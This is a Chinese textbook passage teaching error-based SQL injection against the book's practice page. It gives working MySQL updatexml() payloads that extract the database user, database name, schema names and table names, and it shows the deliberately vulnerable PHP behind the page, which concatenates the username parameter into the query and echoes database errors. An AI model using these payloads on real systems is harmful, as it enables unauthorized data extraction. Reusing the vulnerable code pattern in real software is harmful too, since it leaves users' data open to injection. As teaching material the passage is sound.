报错注入攻击

报错注入攻击的测试地址在本书第2章。

先访问error.php?username=1'，因为参数username的值是1'。在数据库中执行SQL时，会因为多了一个单引号而报错，输出到页面的结果如图4-35所示。

图4-35  

通过页面返回结果可以看出，程序直接将错误信息输出到了页面上，所以此处可以利用报错注入获取数据。报错注入有多种利用方式，此处只讲解利用MySQL函数updatexml()获取user()的值，SQL语句如下：

1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

其中0x7e是ASCII编码，解码结果为~，如图4-36所示。

图4-36

然后尝试获取当前数据库的库名，语句如下：

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

得到的结果如图4-37所示。

图4-37  

接着可以利用select语句继续获取数据库中的库名、表名和字段名，查询语句与Union注入的查询语句相同。因为报错注入只显示一条结果，所以需要使用limit语句。构造的语句如下：

1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

结果如图4-38所示，可以获取数据库的库名。

图4-38  

构造查询表名的语句如下：

1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= 'test' limit 0,1),0x7e),1)--+

如图4-39所示，可以获取数据库test的表名。

图4-39

报错注入代码分析

在报错注入页面，程序获取GET参数username后，将username拼接到SQL语句中，然后到数据库查询。如果执行成功，就输出ok；如果出错，则通过echo mysqli_error($con)将错误信息输出到页面（mysqli_error返回上一个MySQL函数的错误），代码如下：

<?php$con=mysqli_connect("localhost","root","123456","test");if (mysqli_connect_errno()){echo "连接失败: " . mysqli_connect_error();}$username = $_GET['username'];if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){echo "ok";}else{echo mysqli_error($con);}?>

输入username=1'时，SQL语句为select * from users where `username`='1''。执行时，会因为多了一个单引号而报错。利用这种错误回显，可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。